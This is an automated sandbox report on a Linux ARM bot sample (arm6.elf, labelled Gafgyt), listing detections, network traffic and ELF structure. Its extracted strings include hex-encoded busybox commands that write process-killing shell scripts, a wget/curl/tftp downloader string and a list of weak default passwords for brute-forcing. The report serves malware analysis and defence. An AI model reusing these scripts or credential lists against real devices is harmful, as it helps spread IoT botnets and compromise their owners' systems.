Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
arm6.elf

Overview

General Information

Sample name:arm6.elf
Analysis ID:1664419
MD5:334228a837e78a7edb50d9b3275017d3
SHA1:66606ff90c123b84cbc37311afa22837f30505f8
SHA256:198783c5a2a79fa601aeab32c54580f9c94b661c2fd6045671307891b00ea165
Tags:elfuser-abuse_ch
Infos:

Detection

Score:52
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Sample reads /proc/mounts (often used for finding a writable filesystem)
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1664419
Start date and time:2025-04-14 09:42:21 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 46s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:arm6.elf
Detection:MAL
Classification:mal52.troj.linELF@0/2@2/0
Command:/tmp/arm6.elf
PID:5514
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
For God so loved the world
Standard Error:
  • system is lnxubuntu20
  • arm6.elf (PID: 5514, Parent: 5432, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm6.elf
    • arm6.elf New Fork (PID: 5519, Parent: 5514)
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: arm6.elfVirustotal: Detection: 41%Perma Link
Source: arm6.elfReversingLabs: Detection: 41%
Source: arm6.elfString: TSource Engine Query/usr/bin/bash/usr/bin/dash/usr/sbin/wget/usr/bin/curl/usr/bin/tftpGET /t/dlr. HTTP/1.0
Source: /tmp/arm6.elf (PID: 5519)Socket: 127.0.0.1:22448Jump to behavior
Source: global trafficTCP traffic: 192.168.2.14:46540 -> 185.125.190.26:443
Source: unknownTCP traffic detected without corresponding DNS query: 185.125.190.26
Source: unknownTCP traffic detected without corresponding DNS query: 185.125.190.26
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: unknownNetwork traffic detected: HTTP traffic on port 46540 -> 443
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x77\x68\x69\x6c\x65\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x3b\x20\x64\x6f\x20\x6d\x70\x3d\x24\x28\x65\x63\x68\x6f\x20\x22\x24" > kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6c\x22\x20\x7c\x20\x61\x77\x6b\x20\x27\x7b\x70\x72\x69\x6e\x74\x20\x24\x32\x7d\x27\x20\x7c\x20\x73\x65\x64\x20\x27\x73\x2f\x5c" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x5c\x30\x34\x30\x2f\x20\x2f\x67\x27\x29\x3b\x20\x63\x61\x73\x65\x20\x22\x24\x6d\x70\x22\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x5b\x30\x2d\x39\x5d\x2a\x29\x20\x70\x69\x64\x3d\x24\x7b\x6d\x70\x23\x2f\x70\x72\x6f\x63\x2f\x7d\x3b\x20\x5b\x20\x2d\x64\x20\x22" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x2f\x70\x72\x6f\x63\x2f\x24\x70\x69\x64\x22\x20\x5d\x20\x26\x26\x20\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x22\x20" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26\x26\x20\x75\x6d\x6f\x75\x6e\x74\x20\x22\x24\x6d\x70\x22\x20\x32\x3e\x2f\x64" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x2f\x70\x72\x6f\x63\x2f\x6d\x6f\x75" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6e\x74\x73" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20\x70\x69\x64\x5f" > swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6e\x75\x6d\x3d\x22\x24\x7b\x70\x69\x64\x23\x23\x2a\x2f\x7d\x22\x3b\x20\x69\x66\x20\x5b\x20\x2d\x72\x20\x22\x24\x70\x69\x64\x2f" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6d\x61\x70\x73\x22\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x74\x72\x75\x65\x3b\x20\x77" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x68\x69\x6c\x65\x20\x49\x46\x53\x3d\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x69\x6e\x65\x3b\x20\x64\x6f\x20\x63\x61\x73\x65\x20" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x22\x24\x6c\x69\x6e\x65\x22\x20\x69\x6e\x20\x2a\x22\x2f\x6c\x69\x62\x2f\x22\x2a\x7c\x2a\x22\x2f\x6c\x69\x62\x36\x34\x2f\x22\x2a" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x7c\x2a\x22\x2e\x73\x6f\x22\x2a\x29\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x66\x61\x6c\x73\x65\x3b\x20\x62\x72\x65\x61" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6b\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x22\x24\x70\x69\x64\x2f\x6d\x61\x70\x73\x22\x3b\x20\x69\x66" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x20\x5b\x20\x22\x24\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x22\x20\x3d\x20\x74\x72\x75\x65\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x5f\x6e\x75\x6d\x22\x3b\x20\x66\x69\x3b\x20\x66\x69\x3b\x20\x64\x6f\x6e\x65" >> swan
Source: Initial sampleString containing 'busybox' found: sh kmount/bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20\x70\x69\x64\x5f" > swan
Source: Initial sampleString containing potential weak password found: 12345
Source: Initial sampleString containing potential weak password found: 54321
Source: Initial sampleString containing potential weak password found: 654321
Source: Initial sampleString containing potential weak password found: admin1234
Source: Initial sampleString containing potential weak password found: administrator
Source: Initial sampleString containing potential weak password found: supervisor
Source: Initial sampleString containing potential weak password found: password
Source: Initial sampleString containing potential weak password found: default
Source: Initial sampleString containing potential weak password found: guest
Source: Initial sampleString containing potential weak password found: service
Source: Initial sampleString containing potential weak password found: support
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal52.troj.linELF@0/2@2/0

Persistence and Installation Behavior

barindex
Source: /tmp/arm6.elf (PID: 5514)File: /proc/5514/mountsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/3760/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/1583/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/2672/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/110/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/3759/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/111/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/112/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/113/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/234/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/1577/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/1577/exeJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/114/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/235/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/115/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/116/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/117/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/118/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/119/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/3757/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/10/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/917/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/3758/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/11/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/12/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/13/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/14/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/15/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/16/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/17/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/18/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/19/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/1593/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/240/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/120/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/3094/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/121/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/242/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/3406/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/3406/exeJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/1/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/122/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/243/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/2/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/123/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/244/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/1589/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/3/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/124/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/245/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/1588/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/125/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/4/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/246/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/3402/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/3402/exeJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/126/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/5/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/247/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/127/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/6/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/248/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/128/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/7/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/249/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/8/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/129/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/800/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/800/exeJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/9/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/801/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/803/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/20/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/806/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/21/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/807/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/928/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/22/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/23/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/24/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/25/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/26/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/27/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/28/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/29/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/3420/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/3420/exeJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/490/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/250/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/130/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/251/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/131/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/252/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/132/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/253/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/254/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/255/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/135/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/256/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/1599/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/257/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/378/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/258/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/3412/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/3412/exeJump to behavior
Source: /tmp/arm6.elf (PID: 5514)File opened: /proc/259/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5514)Queries kernel information via 'uname': Jump to behavior
Source: arm6.elf, 5519.1.00007f117803b000.00007f1178043000.rw-.sdmpBinary or memory string: vmware
Source: arm6.elf, 5514.1.000055e67e782000.000055e67e8d1000.rw-.sdmp, arm6.elf, 5519.1.000055e67e782000.000055e67e8d1000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
Source: arm6.elf, 5514.1.00007f117803b000.00007f1178043000.rw-.sdmp, arm6.elf, 5519.1.00007f117803b000.00007f1178043000.rw-.sdmpBinary or memory string: qemu-arm
Source: arm6.elf, 5519.1.00007ffc2d43a000.00007ffc2d45b000.rw-.sdmpBinary or memory string: Uqemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: arm6.elf, 5514.1.000055e67e782000.000055e67e8d1000.rw-.sdmp, arm6.elf, 5519.1.000055e67e782000.000055e67e8d1000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: arm6.elf, 5514.1.00007ffc2d43a000.00007ffc2d45b000.rw-.sdmp, arm6.elf, 5519.1.00007ffc2d43a000.00007ffc2d45b000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: arm6.elf, 5514.1.00007ffc2d43a000.00007ffc2d45b000.rw-.sdmpBinary or memory string: U/tmp/qemu-open.M5lsLa:U
Source: arm6.elf, 5514.1.00007ffc2d43a000.00007ffc2d45b000.rw-.sdmpBinary or memory string: /tmp/qemu-open.M5lsLa
Source: arm6.elf, 5514.1.00007ffc2d43a000.00007ffc2d45b000.rw-.sdmp, arm6.elf, 5519.1.00007ffc2d43a000.00007ffc2d45b000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm6.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm6.elf
Source: arm6.elf, 5519.1.00007ffc2d43a000.00007ffc2d45b000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: arm6.elf, 5514.1.00007f117803b000.00007f1178043000.rw-.sdmp, arm6.elf, 5519.1.00007f117803b000.00007f1178043000.rw-.sdmpBinary or memory string: !!a1gAWFxuAXsFWUgBRQAA!!a1gAWFxuAXsAWUgKRXgA!!a1gAWFxuAXsAWEgJR3IA!!a10CWFxuAHsGWVcWQHAA!!a10CWFxuAHsGWVcWQHUA!!aFwAWF9uA3sGW0gLRgAA!!aFwAWFlpG2QBW0gJTwAA!!qemu-arm2QBW0gJTwAA!
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
Path InterceptionDirect Volume Access1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkit1
Brute Force
1
File and Directory Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
SourceDetectionScannerLabelLink
arm6.elf41%VirustotalBrowse
arm6.elf42%ReversingLabsLinux.Backdoor.Gafgyt
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
daisy.ubuntu.com
162.213.35.24
truefalse
    high
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    185.125.190.26
    unknownUnited Kingdom
    41231CANONICAL-ASGBfalse
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    185.125.190.26spc.tsunami.elfGet hashmaliciousUnknownBrowse
      vision.ppc.elfGet hashmaliciousMiraiBrowse
        linux_mips64el.elfGet hashmaliciousChaosBrowse
          linux_aarch64.elfGet hashmaliciousKaijiBrowse
            linux_arm7.elfGet hashmaliciousChaosBrowse
              mips.elfGet hashmaliciousMiraiBrowse
                na.elfGet hashmaliciousPrometeiBrowse
                  boatnet.arm.elfGet hashmaliciousMiraiBrowse
                    dlr.x86.elfGet hashmaliciousUnknownBrowse
                      mirai.mpsl.elfGet hashmaliciousMiraiBrowse
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        daisy.ubuntu.comppc.elfGet hashmaliciousUnknownBrowse
                        • 162.213.35.25
                        mpsl.elfGet hashmaliciousUnknownBrowse
                        • 162.213.35.24
                        arm7.elfGet hashmaliciousMiraiBrowse
                        • 162.213.35.24
                        arm5.elfGet hashmaliciousUnknownBrowse
                        • 162.213.35.24
                        mips.elfGet hashmaliciousMiraiBrowse
                        • 162.213.35.24
                        arm7.elfGet hashmaliciousMiraiBrowse
                        • 162.213.35.25
                        sshd.elfGet hashmaliciousUnknownBrowse
                        • 162.213.35.25
                        m68k.nn.elfGet hashmaliciousMiraiBrowse
                        • 162.213.35.25
                        nemil.arm6.elfGet hashmaliciousMiraiBrowse
                        • 162.213.35.25
                        nabarm6.elfGet hashmaliciousUnknownBrowse
                        • 162.213.35.25
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        CANONICAL-ASGBsshd.elfGet hashmaliciousUnknownBrowse
                        • 91.189.91.42
                        mpsl.elfGet hashmaliciousUnknownBrowse
                        • 91.189.91.42
                        arm6.elfGet hashmaliciousUnknownBrowse
                        • 91.189.91.42
                        na.elfGet hashmaliciousPrometeiBrowse
                        • 91.189.91.42
                        na.elfGet hashmaliciousPrometeiBrowse
                        • 91.189.91.42
                        ppc.elfGet hashmaliciousUnknownBrowse
                        • 91.189.91.42
                        arm7.elfGet hashmaliciousMiraiBrowse
                        • 91.189.91.42
                        mips.elfGet hashmaliciousMiraiBrowse
                        • 91.189.91.42
                        na.elfGet hashmaliciousPrometeiBrowse
                        • 91.189.91.42
                        na.elfGet hashmaliciousPrometeiBrowse
                        • 91.189.91.42
                        No context
                        No context
                        Process:/tmp/arm6.elf
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):262
                        Entropy (8bit):3.451871736599313
                        Encrypted:false
                        SSDEEP:6:GDF/NMGz/VUH/vYDF/dY/VjmsVot/VOArB/VH:CUGCnQXl
                        MD5:6C4569BFD084A7799CC9D1E0A599C416
                        SHA1:92DE53915F2F8235CA8E596558DB1A7B03D03876
                        SHA-256:D29406AEF8E36C3D9964BC3F924D5CC6A456FA77F5734B96EE2E783171232CEE
                        SHA-512:D0065DB4867C76B7B2FFDF774DA4AD11ABF72479703B0CBA6E4B848E778D0B4885ECB0A78352A51F947FAC3B0E05C9954479CD0AE74113E1D8EEFCEAA20CA396
                        Malicious:false
                        Reputation:low
                        Preview:8000-24000 r-xp 00000000 fd:00 531606 /tmp/arm6.elf.2b000-2c000 rw-p 0001b000 fd:00 531606 /tmp/arm6.elf.2c000-34000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
                        Process:/tmp/arm6.elf
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):262
                        Entropy (8bit):3.451871736599313
                        Encrypted:false
                        SSDEEP:6:GDF/NMGz/VUH/vYDF/dY/VjmsVot/VOArB/VH:CUGCnQXl
                        MD5:6C4569BFD084A7799CC9D1E0A599C416
                        SHA1:92DE53915F2F8235CA8E596558DB1A7B03D03876
                        SHA-256:D29406AEF8E36C3D9964BC3F924D5CC6A456FA77F5734B96EE2E783171232CEE
                        SHA-512:D0065DB4867C76B7B2FFDF774DA4AD11ABF72479703B0CBA6E4B848E778D0B4885ECB0A78352A51F947FAC3B0E05C9954479CD0AE74113E1D8EEFCEAA20CA396
                        Malicious:false
                        Reputation:low
                        Preview:8000-24000 r-xp 00000000 fd:00 531606 /tmp/arm6.elf.2b000-2c000 rw-p 0001b000 fd:00 531606 /tmp/arm6.elf.2c000-34000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
                        File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                        Entropy (8bit):6.207715240596913
                        TrID:
                        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                        File name:arm6.elf
                        File size:112'164 bytes
                        MD5:334228a837e78a7edb50d9b3275017d3
                        SHA1:66606ff90c123b84cbc37311afa22837f30505f8
                        SHA256:198783c5a2a79fa601aeab32c54580f9c94b661c2fd6045671307891b00ea165
                        SHA512:6e1d9bd6c00877c1259d9e4ea846f9e6c2c6784d17436e2aeafca49b3323a75db62559817a5ac5d4383fcdf26d370410e6d31fbacc99a7d5d97ce1f7f64c57ba
                        SSDEEP:3072:Vtayt7SeoCbqX3OCumy1jVf1OOLOFhldQ:Vtbt7yCL9jB1nLqhk
                        TLSH:35B30999B8918F66C5D606BFFE1F428D33232BB8E3DA7107CD146B24368A95A0D3F541
                        File Content Preview:.ELF..............(.....l...4...........4. ...(........p.....2...2......................................................................lX..........Q.td.............................@-..@............/..@-.,@...0....S..... 0....S.........../..0...0...@..../

                        ELF header

                        Class:ELF32
                        Data:2's complement, little endian
                        Version:1 (current)
                        Machine:ARM
                        Version Number:0x1
                        Type:EXEC (Executable file)
                        OS/ABI:UNIX - System V
                        ABI Version:0
                        Entry Point Address:0x816c
                        Flags:0x4000002
                        ELF Header Size:52
                        Program Header Offset:52
                        Program Header Size:32
                        Number of Program Headers:4
                        Section Header Offset:111644
                        Section Header Size:40
                        Number of Section Headers:13
                        Header String Table Index:12
                        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                        NULL0x00x00x00x00x0000
                        .initPROGBITS0x80b40xb40x140x00x6AX001
                        .textPROGBITS0x80c80xc80x185d40x00x6AX004
                        .finiPROGBITS0x2069c0x1869c0x140x00x6AX001
                        .rodataPROGBITS0x206b00x186b00x2b6c0x00x2A004
                        .ARM.exidxARM_EXIDX0x2321c0x1b21c0xc80x00x82AL204
                        .eh_framePROGBITS0x2b2e40x1b2e40x40x00x3WA004
                        .init_arrayINIT_ARRAY0x2b2e80x1b2e80x40x00x3WA004
                        .fini_arrayFINI_ARRAY0x2b2ec0x1b2ec0x40x00x3WA004
                        .gotPROGBITS0x2b2f40x1b2f40x280x40x3WA004
                        .dataPROGBITS0x2b31c0x1b31c0x9c0x00x3WA004
                        .bssNOBITS0x2b3b80x1b3b80x57980x00x3WA008
                        .shstrtabSTRTAB0x00x1b3b80x620x00x0001
                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                        EXIDX0x1b21c0x2321c0x2321c0xc80xc84.33810x4R 0x4.ARM.exidx
                        LOAD0x00x80000x80000x1b2e40x1b2e46.21790x5R E0x8000.init .text .fini .rodata .ARM.exidx
                        LOAD0x1b2e40x2b2e40x2b2e40xd40x586c3.57850x6RW 0x8000.eh_frame .init_array .fini_array .got .data .bss
                        GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                        TimestampSource PortDest PortSource IPDest IP
                        Apr 14, 2025 09:43:23.825524092 CEST46540443192.168.2.14185.125.190.26
                        Apr 14, 2025 09:43:54.544361115 CEST46540443192.168.2.14185.125.190.26
                        TimestampSource PortDest PortSource IPDest IP
                        Apr 14, 2025 09:43:19.599184990 CEST4432453192.168.2.148.8.8.8
                        Apr 14, 2025 09:43:19.599241972 CEST4605753192.168.2.148.8.8.8
                        Apr 14, 2025 09:43:19.705626965 CEST53460578.8.8.8192.168.2.14
                        Apr 14, 2025 09:43:19.705653906 CEST53443248.8.8.8192.168.2.14
